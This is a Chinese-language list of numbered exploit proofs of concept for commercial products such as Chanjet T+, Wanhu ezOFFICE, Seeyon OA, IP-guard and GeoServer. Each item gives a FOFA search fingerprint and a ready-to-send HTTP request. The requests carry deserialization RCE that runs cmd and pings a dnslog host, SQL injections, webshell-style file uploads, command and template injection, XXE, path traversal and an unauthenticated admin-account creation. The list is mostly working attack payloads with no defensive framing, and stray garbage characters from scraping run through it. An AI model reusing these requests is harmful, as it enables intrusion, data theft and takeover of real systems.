3 f. u0 q# H7 @! I/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers! Z+ j/ W6 A, X

/ O1 A( _3 s  V' j) U* B56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE" o4 z" p0 Z9 D1 I
FOFA: app="畅捷通-TPlus"- D2 P+ o" O7 a- c3 G/ O* @' F! h* f
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.16 i5 @+ X& m* z8 c, x. M
Host: x.x.x.x
! g. c3 l/ p# W5 \  d! }2 b5 gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36  k1 O) j7 L6 f! e3 m
Content-Type: application/json
/ N* Q& V" L* d- ]" u$ O5 ?6 K' `+ `* u5 L
{
6 p2 f* X/ W/ z6 j/ C" l  "storeID":{6 c4 Q6 b0 u/ s& }# d
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
; Y8 l0 E1 v. _) K- N$ v! U   "MethodName":"Start",
* P. p- j. l1 S* Q  w- ^# Y    "ObjectInstance":{
, ?, o% B6 f0 ^! S$ L       "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",/ @* W5 L2 F! f# f8 t/ J: [
        "StartInfo": {1 t( v8 g8 m4 m3 }% C
           "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0 P( q4 f9 M# Q, k$ U& H+ Z. b7 `
           "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"3 t2 ~- f# B  R
       }
9 H& Y: A/ s+ w" z" j5 }) Q" U  `1 Y8 i    }( [2 W7 Q0 m6 a: e6 h# D
  }
- M! B& U/ o/ c7 t}
$ R6 y& U. q) l" N
+ j7 ?. T; f' A. ]) q9 V. I; g# J& M' |) M+ w1 X
57. 畅捷通T+ keyEdit.aspx SQL注入2 l' R, j! d1 {/ a
FOFA:app="畅捷通-TPlus"
- y2 w7 E0 q1 z1 g8 d; N& x4 ^GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
" t5 n4 |+ g% }1 }6 n$ ZHost: host
% t/ t4 h  c# y* [7 H4 N; E* vUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.364 M0 r; U# N0 L- o
Accept-Charset: utf-8( G+ U. _; W% G) i
Accept-Encoding: gzip, deflate
. P' W! |  [+ L/ PConnection: close
' T4 H+ m3 ]5 ~% p* Y/ a6 u
7 @# W0 A3 j6 |) ?) a. o( D2 g# t+ h2 }. K7 m" _; n
58. 畅捷通T+ KeyInfoList.aspx sql注入
, F5 [4 ?5 f/ i; cFOFA:app="畅捷通-TPlus", d' l: J% ]' L" \
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
9 \0 A7 i! w0 S* PHost: your-ip
7 W9 S. a  g- w+ Q% lUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
4 E2 H; ?2 \1 n# ], R$ SAccept-Charset: utf-8
% Z0 o" p) k& K# c7 Y& U; j1 QAccept-Encoding: gzip, deflate# L+ l% n- L# S
Connection: close& ~6 q) j$ \( x; p1 P1 J

& m; p: A3 I8 G) Z# R% J, x
" \$ c/ ?0 n! ?# ^" I& Y59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行9 [* \8 _, X7 {- v" r4 l
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd". _$ ~/ A. M# c! I, _
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1. ^8 u: w; F' `/ }8 m9 R
Host: 192.168.86.128:9090, L7 R2 J7 f# v, I/ }  A0 m
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
& [/ E8 R- J5 m% T/ X4 b; j  pConnection: close8 U9 N: @* o. N% Z
Content-Length: 16697 G0 F( _. v& r) W0 {
Accept: */*+ q7 i* Q' n! M* t! J1 R7 g5 B
Accept-Language: en
  }9 ?; e5 L5 b1 kContent-Type: application/x-www-form-urlencoded
# L  |% t. I* l9 W& sAccept-Encoding: gzip: t6 e  c/ _! ?# D# H1 s/ S- Q, A

0 o( `. s* v  r; v- V9 rPAYLOAD
$ D% F5 d$ k( {! {, e& Y9 V8 @' O0 E( t/ W  ]9 ^3 ^

, r; F+ a! T* @5 v/ `60. 百卓Smart管理平台 importexport.php SQL注入1 P8 T" n& z- }% S( }
FOFA:title="Smart管理平台"( {" Q* ?' g. ]9 ^; ]# P! |
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
, F3 |: s+ P1 p* s2 X4 jHost:
( g, [# J. S9 p4 ^) ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
# h3 h0 G* u4 g. g) ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, n) n" R9 @9 c- x# O$ f3 W6 MAccept-Encoding: gzip, deflate
# r  `9 v* d( L2 C( DAccept-Language: zh-CN,zh;q=0.92 L6 j4 Z: z& z0 n) p# Q
Connection: close
8 ~$ L5 m9 V' Z
: r& l, [! e/ I5 F1 G' u0 i5 q' D/ ~4 B( g# S/ E. @* g
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传" V5 w, N" W8 R  V" ]
FOFA: title="欢迎使用浙大恩特客户资源管理系统"& H+ `$ v- F0 b) F9 J
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1: I8 p8 {! ^' G7 ^3 y
Host: x.x.x.x( J, k6 L* o3 K* |5 P6 y% w) ]1 @; C6 O% f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
/ e% O% O3 f7 P& v" vConnection: close% e- Y0 M+ x" Y" P1 v. `
Content-Length: 27( O( }% M( L  ]: ?; [7 R: h+ ~& E
Accept: */*
5 r$ C* }& q$ i; n) B: y$ [9 Z. AAccept-Encoding: gzip, deflate/ I6 I: o5 g0 f5 `# [
Accept-Language: en, _7 t, [6 Q  r$ C1 N. G
Content-Type: application/x-www-form-urlencoded
0 M' j8 D7 a) G8 U' j, }" j! J1 @7 F2 E3 S: |1 P. K
8uxssX66eqrqtKObcVa0kid98xa
7 t0 p, M8 [, \/ |. V- d9 Y0 I3 l7 D5 r: U- {  P2 w0 C0 Y) j, o
3 M2 c# u& {# C# r# P3 L) j3 y
62. IP-guard WebServer 远程命令执行& ^) t5 K4 V0 M! z
FOFA:"IP-guard" && icon_hash="2030860561"+ c) e& ?1 e8 U" ~6 r
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
5 f* t/ z: c  H4 Z& iHost: x.x.x.x
& v$ N* B# O( \9 BUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36( Y! L9 D/ c# @
Connection: close- g" \1 D! w2 F! k/ D9 o( `/ j
Accept: */*
# B4 h7 g, _: ^" W' `" P2 P' P, dAccept-Language: en  a+ L) j  D. |. p- K  {6 D) s
Accept-Encoding: gzip
5 B6 A$ O* W: }' U; V
0 n# Z  ]3 f4 }
( l/ b, x7 l& x, C( B访问- X% V$ ?  T' V' p& Z! B. N

5 j+ N0 _0 ?% t* r9 tGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1* D: ~: u% P" N/ f6 G% R
Host: x.x.x.x8 \- P) n) y$ Y4 F1 U- @& {

( t. S8 `# Y* W" b
- |( O' X# p- m+ t; e. T4 K6 Z63. IP-guard WebServer任意文件读取; t3 D0 M* r) Y0 G+ \. ^( Z* |5 w
IP-guard < 4.82.0609.05 U5 S, E$ L0 n, n7 Z( q
FOFA:icon_hash="2030860561"
2 @3 {2 \* w" j  d0 i2 [  }POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
" b1 o- K! z9 P+ `7 ?$ \Host: your-ip
% h5 x+ d9 j. k# Y6 b) Z6 I+ |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.368 a4 ]1 e( G4 E# @$ w# N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, B/ w1 [% R" K* o( l! uAccept-Encoding: gzip, deflate: [& G2 f1 j- \/ M1 ^7 _% ~
Accept-Language: zh-CN,zh;q=0.9
( D6 G$ D; n* h2 a! l9 y1 YConnection: close
# `4 K* d: }$ M0 F' |/ Z2 xContent-Type: application/x-www-form-urlencoded4 f0 K7 d  f) ^1 E! P

$ Q: u' S% Q: I3 B9 z: q: N* Tpath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
( f$ z5 M1 q' g7 a. Z9 h# J% p/ m, c5 H
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
: Y6 b; o0 Z, r0 T( n, b0 W9 OFOFA:body="/Scripts/EnjoyMsg.js"
9 P" E- j: [2 O  z) c, L; G7 |4 kPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
( D/ I$ ]9 l6 m; |) a6 iHost: 192.168.86.128:9001
8 o7 ?: U% K) G/ E6 rUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
8 C& A" N4 F0 ~( t' e# ZConnection: close6 _  G( e$ q" [+ g/ N) _4 d& q2 `5 _
Content-Length: 369
$ d8 o' p9 p! H( T; D& ?Accept: */*
5 d+ g3 N- \3 b* i* ]( c- lAccept-Language: en$ p5 W, z( m. g) S7 r& p* c; M; [& {
Content-Type: text/xml; charset=utf-8
6 H. d+ {% I9 u5 A; Y9 nAccept-Encoding: gzip
( j. K; `. v9 k/ Z- N1 \% C1 r+ @; h
<?xml version="1.0" encoding="utf-8"?>
/ s9 `* V+ W' d  P" s<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">" B7 f, G0 v2 W
<soap:Body>! l3 d* S3 V( L: d9 [7 v; }
    <GetOSpById xmlns="http://tempuri.org/">
4 a( V' k* e; R/ C# S% J3 x      <sId>1';waitfor delay '0:0:5'--+</sId>
. j$ d, Z0 w2 d0 B+ n  G4 y    </GetOSpById>& o: J6 U6 q& f. t# }) O  }# |! H
  </soap:Body>" i* t( j6 U- u2 K2 M& s1 o
</soap:Envelope>
4 v. N% ?& F1 z1 @; P# a4 U' P) F% W# a) W0 V/ G/ s

) f: f  P, X/ o* X0 l" }65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
9 p" H% \2 L, O5 Z- JFOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"$ u$ j* x/ R& c% {  ?/ L4 y
响应200即成功创建账号test123456/123456
% S* r6 u2 H" b- F( SPOST /SystemMng.ashx HTTP/1.1
8 p6 _7 ~: L& NHost:
/ G# f( @2 X, H+ e, J! K. S* oUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
3 ?" p  m4 x' oAccept-Encoding: gzip, deflate
+ v& n4 `9 o; k$ p8 x+ j8 R6 cAccept: */*0 B/ Q: ^7 J/ m7 w  _
Connection: close5 h, J! x6 u) _0 P; U
Accept-Language: en
" t. y+ E0 X' ZContent-Length: 174# f; o/ r: z7 H( |8 v- _

4 s0 f' b6 `8 Y; D  O; ToperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators4 k% @, i6 \' ]
1 X, Z% b: F, v$ D
( S$ \& X7 Y+ l4 f3 u! {
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入: y! h& ?+ ^6 Y. l5 |' b
FOFA:app="万户ezOFFICE协同管理平台"  G- q0 l. }( r& F8 E

6 D" M5 g; I" p) {# |4 PGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
9 W$ M& A7 R0 b  i0 D7 sHost: x.x.x.x
* Q  u3 Z9 s1 }6 ]9 ?User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.360 _; y! y8 b( v/ G. Q# w- j
Connection: close
2 }  C9 A0 `) q+ }Accept: */*! D) X8 p8 x8 M4 M
Accept-Language: en
  J. Y/ v( l& GAccept-Encoding: gzip
) p: ^% q9 q, B8 p, g: D
2 f+ z7 L8 M/ _( r6 t, w* p! J- Z2 I- x! `! S# w) Q
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
. g- l, j$ E$ {2 F) g/ F0 J
  o1 h7 d: e" F1 v! @, ]8 n5 A# m" \67. 万户ezOFFICE wpsservlet任意文件上传
, ~2 K& N! ^) R# C. A) GFOFA:app="万户网络-ezOFFICE"/ N8 |& g/ g! J+ R& D- g
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
3 x" V& B" v  |/ Z# b7 hPOST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
& J( M: g# N+ aHost: x.x.x.x
( v; A2 L+ w" s0 l6 ~User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
* w0 _& ~1 r8 P( _3 A- LContent-Length: 173
0 r: H  `2 I$ z; B7 @8 k* SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8; @. i7 T; G0 |
Accept-Encoding: gzip, deflate, a& ?# U( W0 B" ?" I
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
* j* o$ Q  l3 Z& k4 N' q; k: L+ K3 AConnection: close
. y' b- F" R6 C" ^7 j7 A2 aContent-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp7 x9 i4 l7 V3 S2 Q- o/ R0 C7 G
DNT: 1
! t2 J2 ?* y5 P. c7 ]2 i" u7 WUpgrade-Insecure-Requests: 13 p( @/ m2 Z8 Z6 J
* B1 ?. r5 R) X: R
--ufuadpxathqvxfqnuyuqaozvseiueerp5 _# E2 j- z8 u
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"$ S. w& k# ]3 [% t' {7 D" D; E# U
" x, f- a/ N" l2 }5 q' P4 A# l
<% out.print("sasdfghjkj");%>
) {8 U6 L' c2 D8 ~--ufuadpxathqvxfqnuyuqaozvseiueerp--
6 Y4 C) E( O: r6 }$ w# B+ U
9 Z  G7 \  j% m& G% N4 A
, U1 \  N! G2 ~  c! v  Y文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
' R0 x6 e; I. ]
$ s, E- n# a1 ?: z* D68. 万户ezOFFICE wf_printnum.jsp SQL注入, ~6 Z" m- m2 r5 }, B
FOFA:app="万户ezOFFICE协同管理平台"
9 E0 l6 s6 k( \, k* Y" rGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.10 ?; v2 @: W) Y8 X8 n" f
Host: {{host}}
# i9 c( ~" r6 n. g6 OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36/ b; Z. ?. ]+ }5 P
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8: d; @2 `/ V) Z- l
Accept-Encoding: gzip, deflate
. G. ^% o/ w( CAccept-Language: zh-CN,zh;q=0.94 h+ x6 ~: o3 T: m' M
Connection: close, A7 ^# e$ @- ^' x

, Y6 [7 |. v& n; p1 p1 k3 O0 |. H8 f2 I, g- ~% A9 Z9 q
69. 万户 ezOFFICE contract_gd.jsp SQL注入& X5 b+ c7 K) s& |! S
FOFA:app="万户ezOFFICE协同管理平台"6 r7 R) a7 |8 L+ R: a2 \# U
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
  y  `% Y' `7 R3 ]& {9 m. cHost: your-ip# ^7 e; m/ n& T) N7 d- A9 M. U1 L
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
- S) V  C1 c) UAccept-Encoding: gzip, deflate3 N1 P+ H* U$ B) ]3 z
Accept: */*, b; a1 k# ?  ?+ P
Connection: keep-alive+ _3 d  K" K, j; h" _

* \, ~. {& |0 _7 v3 W0 z# s5 P1 C# ]$ G# h7 c+ ?) c2 o
70. 万户ezEIP success 命令执行" d# A* X! ]- ^- V) P
FOFA:app="万户网络-ezEIP"
8 |9 T  t, D; m7 APOST /member/success.aspx HTTP/1.1& |6 L7 R7 `0 D! ]/ W
Host: {{Hostname}}$ w7 A6 d. R- B2 m$ J2 p8 o5 _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
" P, v1 L( Y7 i  Q+ {" qSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=8 t! J+ {" V; Y2 f8 p: Y& _' }
Content-Type: application/x-www-form-urlencoded% G5 d: v; E2 I( C" }, e4 S
TYPE: C
- V" S* Z2 r+ b+ `& eContent-Length: 16702* ~; G( e* W" ~1 z  P
8 m3 h  w6 `4 U9 c
__VIEWSTATE=PAYLOAD6 a9 P2 [- \, n/ V
- A" ]: A  m7 ~' M5 v

9 L9 K% _& R6 `# p71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入$ x% [6 Q; @/ G4 V% V
FOFA:body="PM2项目管理系统BS版增强工具.zip"
+ C/ |1 J2 e: @) i. h* ZGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
) B$ L, M0 z( h$ qHost: x.x.x.xx.x.x.x" X& E  U3 e& E# i
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
0 s4 z! ]+ e/ fConnection: close
8 n$ h. K2 f/ U* R" u! AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ x# p! s, W0 w7 c, V# F- NAccept-Encoding: gzip, deflate
7 V- O8 F9 r  ~1 U( nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! D/ h: ]7 f( O6 G3 P; _  \
Upgrade-Insecure-Requests: 16 J/ M. o; r5 `% l) u* t
8 Z% q. E- J) e& w9 f

8 B+ j" R. X; _: k72. 致远OA getAjaxDataServlet XXE  G9 \' Y5 }0 @! x. ~
FOFA:app="致远互联-OA"( E# o: f7 a5 H7 o2 f
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1% D$ A! L9 c1 L1 f/ ?* {6 K5 B
Host: 192.168.40.131:8099
$ R! n* y* s  ], W# ]User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36' Q) h; c- t9 _( ]7 i
Connection: close- }( I: L' \' G, c
Content-Length: 583
. Y9 ^0 K% U) A- S$ }% s$ o5 u4 dContent-Type: application/x-www-form-urlencoded
7 k( I5 A* f- N, YAccept-Encoding: gzip9 ?. I- p3 V8 n  y. C& w  A$ O

  m8 l6 {9 g( g! aS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
: Z; m$ ]( e  o, t, D  f: w$ b4 V$ @' P. T+ ]: @

4 ~. w; W2 S; p: v73. GeoServer wms远程代码执行
: W/ t9 O! c* ?8 z- V) n! YFOFA:icon_hash=”97540678”
- D! F" A4 _, w+ P9 BPOST /geoserver/wms HTTP/1.1
( I2 V( T1 l3 A: }% J; }Host:
7 g4 Q* x- n, @2 ?  rUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36* E. ^# W$ I4 O) }
Content-Length: 1981; x2 s) A& g7 x, O# v
Accept-Encoding: gzip, deflate, v: D! @* G" z' e) W# u' f. q
Connection: close
8 P6 l6 J; i8 l, |* S. PContent-Type: application/xml
& R* T1 D0 W  L7 D1 P' R! WSL-CE-SUID: 3
" ]9 Q5 L2 K% S. }
4 h& j! F6 k2 H! Q9 P3 ]3 v7 MPAYLOAD
5 [$ m$ w* ?, t; r% {
5 P8 G  Z) W# w$ f% X
+ N( g4 l( N* ?/ Q74. 致远M3-server 6_1sp1 反序列化RCE7 R1 z: p, J0 W( |/ F$ b7 q
FOFA:title="M3-Server"
7 q1 a9 k* }" V& _PAYLOAD) I" z& s7 H' }4 L5 t! k

! X6 W0 o, S3 R3 ]2 u75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE. c. p2 K! P- T) v, O4 V& q: R
FOFA:app="TELESQUARE-TLR-2005KSH"
" W' ?! S6 q9 s8 H# ^' _GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1$ |" K0 ?4 b. K4 a: P$ E' V* X
Host: x.x.x.x
  r4 g3 ?9 K& D! [7 h7 F: W6 Q7 R. cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
3 T! ]# L3 f$ D8 qConnection: close
. D$ W% i2 O+ j6 rAccept: */*) }6 B) N6 P8 P; c' ^- ~2 T
Accept-Language: en
+ h/ r7 ?) \, w* ~0 K* r% TAccept-Encoding: gzip; D# ^# i8 E7 i

/ O3 t; c3 k$ L1 m! R5 p4 s) U4 x; j/ b* p1 L' z5 k! ]
GET /cgi-bin/test28256.txt HTTP/1.17 R" z& T; J( N2 G- B: v- s
Host: x.x.x.x$ R1 s- b$ s  F/ d  x4 ~

  v& [1 B2 J' R  z9 @3 l1 `5 h; E, L' l- K: R6 w
76. 新开普掌上校园服务管理平台service.action远程命令执行
7 s  k6 Z6 Q' y' a& X$ I& GFOFA:title="掌上校园服务管理平台"0 n; x( Z2 R! I) h
POST /service_transport/service.action HTTP/1.1% g, t* i& U" A$ i6 l
Host: x.x.x.x
, ?) U. z7 Z& X9 X  QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
5 b" b4 m# [0 X. l3 ~3 z, @4 Q7 bConnection: close
8 p% o! p8 S$ Y( n6 h5 `Content-Length: 211* ?! n4 g. P4 `  J) f+ b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.86 i1 h  q  \/ I) x9 E* f
Accept-Encoding: gzip, deflate. S$ k0 {: ~8 [* c  Q( |
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: z9 r" `# A, n+ U/ K
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
: n& |0 g5 a% x' B" ^% XUpgrade-Insecure-Requests: 1
0 N* `. d! u8 y; w4 q4 h  J. Y6 S9 T9 ?( {/ I
{1 n$ H! G$ o& K1 N
"command": "GetFZinfo",
) l' F* b& ]  w9 @  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"$ [7 E' J+ O  b4 D  ]8 i# w: w' k/ v
  ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}") g% H" N2 n; B6 a7 w8 J
}+ p. F3 h8 L0 ^/ C  h9 T) N1 N' m
0 [1 b  A: z" W+ A. E" o

& Q6 X: w; P! F2 O& Y$ r- cGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1# Z% v" y8 r1 f3 h% S; U( h* N
Host: x.x.x.x
, V; |1 |! v$ g" ?+ k- V. k3 \: i8 i. R  M# [

2 M1 b8 ?# @  r  D
" x8 ^; C7 r2 U77. F22服装管理软件系统UploadHandler.ashx任意文件上传8 D1 B: `' h  O: ~" |
FOFA:body="F22WEB登陆"
0 O5 W' H* k" f+ O! `( Q# iPOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.10 W! W$ U, ^0 Y$ ?/ @
Host: x.x.x.x! p3 H2 _9 F7 Q# j( |% |* N
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36% x" m+ F3 [& O* q0 @; k9 P
Connection: close
) t* @& j  S9 y; B4 |Content-Length: 433
1 n# c4 @# j$ @* e3 ?7 WAccept: */*  B$ N9 O, Z% A( O
Accept-Encoding: gzip, deflate
; ]7 D% ?2 }# N6 A8 o! kAccept-Language: zh-CN,zh;q=0.9
- d9 X. Q; q' k7 d( g! ZContent-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
! V# B, _3 i# t2 {! I. }9 {
' k* w( |1 [. u0 z1 v0 \+ M; t------------398jnjVTTlDVXHlE7yYnfwBoix
2 \8 i1 M6 K% F2 P: j/ p( n$ eContent-Disposition: form-data; name="folder"$ z5 u. S, C, s5 ]- k  r

) m& N; p; Y7 H, N/upload/udplog
  A1 r$ ]- S0 S; s5 \. o; x------------398jnjVTTlDVXHlE7yYnfwBoix
; h) {) J; J* @: M1 O# aContent-Disposition: form-data; name="Filedata"; filename="1.aspx"' {! ~: M# p8 @5 t% B6 e3 Y
Content-Type: application/octet-stream
, ?* Q  Z3 B/ L5 q  a6 T/ {$ Y! R6 G+ n# \
hello1234567
  W9 q. k" H% k/ s7 A: Y( A------------398jnjVTTlDVXHlE7yYnfwBoix1 c1 T  L$ X6 C: v) v# ]4 L7 a
Content-Disposition: form-data; name="Upload"
' C: F7 K& r' W8 b% f
8 q' k2 ]* K- M1 v5 [3 L+ b- OSubmit Query+ {% g7 t+ B7 A4 k. E8 O$ Y
------------398jnjVTTlDVXHlE7yYnfwBoix--
( u  g5 N9 m) ?+ l1 X  i, h$ v4 H7 Y5 s

. h$ b0 B8 l/ H* _3 p- k4 V78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
( c5 @7 D" B4 C. W, tFOFA:icon_hash="2001627082"
" ]9 m7 O' Q" O8 ^POST /Platform/System/FileUpload.ashx HTTP/1.1
. Z. ~1 l/ d4 F# a& ~+ _- u; JHost: x.x.x.x  ]. h' u& g2 u6 \4 p% r- Z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.155 F" \7 ], [1 ]& w$ N" R9 p, J% n
Connection: close
